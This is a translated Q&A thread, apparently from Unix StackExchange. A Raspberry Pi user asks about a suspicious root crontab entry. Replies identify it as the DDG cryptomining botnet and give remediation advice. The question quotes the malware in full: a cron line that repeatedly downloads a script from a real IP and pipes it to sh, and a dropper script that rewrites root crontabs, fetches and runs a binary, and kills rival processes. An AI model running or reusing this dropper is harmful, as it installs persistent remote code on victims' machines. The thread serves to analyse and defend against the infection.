Entri mencurigakan menjalankan crontab 'xribfa4' setiap 15 menit

59

Saya ingin menambahkan sesuatu ke file root crontab saya di Raspberry Pi saya, dan menemukan entri yang tampaknya mencurigakan bagi saya, mencari bagian-bagiannya di Google tidak menghasilkan apa-apa.

Entri crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Isinya http://103.219.112.66:8000/i.shadalah:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Pengetahuan Linux saya terbatas, tetapi bagi saya sepertinya mengunduh binari dari server Indonesia dan menjalankannya sebagai root secara teratur bukanlah sesuatu yang biasa.

Apa ini? Apa yang harus saya lakukan?

security cron malware Peter Dam
sumber
16
Itu bundar. Setiap 15 menit ia mengunduh dan menginstal salinannya sendiri. Jika / ketika salinan pada server jarak jauh diubah, semua server yang menjalankan cronjob ini akan mengeksekusi kode apa pun yang baru, dalam waktu 15 menit.
Wildcard
5
Apakah raspberry pi Anda terbuka untuk internet? Apa raspberry pi Anda berjalan? Ini adalah satu-satunya hasil di google ketika saya mencari xribfa4. Jika Anda tidak menjalankan perangkat lunak yang perlu melakukan ini maka kemungkinan besar ini adalah virus.
kemotep
6
@ememepep string itu acak, tetapi google untuk IP dan memberikan beberapa hasil. Sesuatu tentang botnet penambangan
ddg
9
Aku menemukannya. Sangat gila bahwa IP terdaftar di situs Pemerintah Indonesia. Sepertinya ada hampir 2000 ips lain yang mengirimkan payload ini.
kemotep
21
Hal utama yang harus Anda perhatikan adalah bahwa bahkan jika Anda menghapus entri crontab itu, sistem Anda kemungkinan besar masih memiliki kerentanan yang memungkinkannya untuk terinfeksi. Anda perlu menemukan dan memperbaiki kerentanan itu.
Hans-Martin Mosner

Jawaban:

79

Ini adalah botnet penambangan DDG, cara kerjanya:

  1. mengeksploitasi kerentanan RCE
  2. memodifikasi crontab
  3. mengunduh program penambangan yang sesuai (ditulis dengan go)
  4. memulai proses penambangan

DDG: Botnet Penambangan Bertujuan di Server Database

SystemdMiner ketika botnet meminjam infrastruktur botnet lain

U&L: Bagaimana saya bisa membunuh malware kecil di instance AWS EC2? (server yang dikompromikan)

GAD3R
sumber
4
Ya, ini sepertinya benar. Terima kasih! Akan menandai ini sebagai jawaban, jika tidak ada yang baru muncul.
Peter Dam
8
Jangan lupa saran yang biasa untuk mesin yang di-root: coba dan cari tahu bagaimana mereka masuk sehingga Anda bisa memperbaiki lubangnya. Belajar dari ini, dan tingkatkan keamanan Anda. Akhirnya, nuke dan instal ulang mesin.
marcelm
3
Berita baiknya adalah mereka tampaknya tidak memiliki penambang untuk Pi, hanya untuk i686 dan x86_64.
Tandai
13
@ Mark Bagaimana kabar baik itu? Seseorang mendapatkan kendali penuh atas Pi-nya menggunakan titik masuk yang tidak diketahui, dan memiliki akses penuh ke setiap rahasia pada Pi (termasuk tetapi tidak terbatas pada kata sandi). Apakah penambang berjalan atau tidak benar-benar berada di ranah "ketidaknyamanan kecil".
marcelm
4
@marcelm, penyerang mendapatkan kendali penuh atas itu, dan kemudian hampir pasti tidak melakukan sesuatu yang signifikan dengan kontrol itu.
Tandai
2

Cari tahu port TCP dan UDP mana yang benar-benar dibutuhkan, dan kemudian blok semua port lain di firewall router Anda. Mungkin , entri crontab itu tidak akan muncul kembali.

Anda dapat melihat port mana yang terbuka dan publik dengan menggunakan Shields Up! fitur di grc.com .

Mike Waters
sumber
5
Atau dia bisa menambal kerentanan.
Harper - Reinstate Monica
1
@ Harper Absolutely! Itu diberikan. Saya berpikir bahwa mungkin tanpa memblokir port yang tidak digunakan terlebih dahulu, mungkin terinfeksi ulang saat dia mencoba untuk menambalnya.
Mike Waters
1
Komentar yang relevan dari security.SE: security.stackexchange.com/questions/147770/…
Wildcard
1
Ini (tidak terbatas hanya pada TCP dan UDP), selalu. Aka model keamanan positif, daftar putih atau tolak secara default - tolak semua lalu lintas yang tidak Anda gunakan atau butuhkan secara eksplisit - satu-satunya cara untuk memastikan tidak ada lubang Anda yang terkena penetrasi.
antikris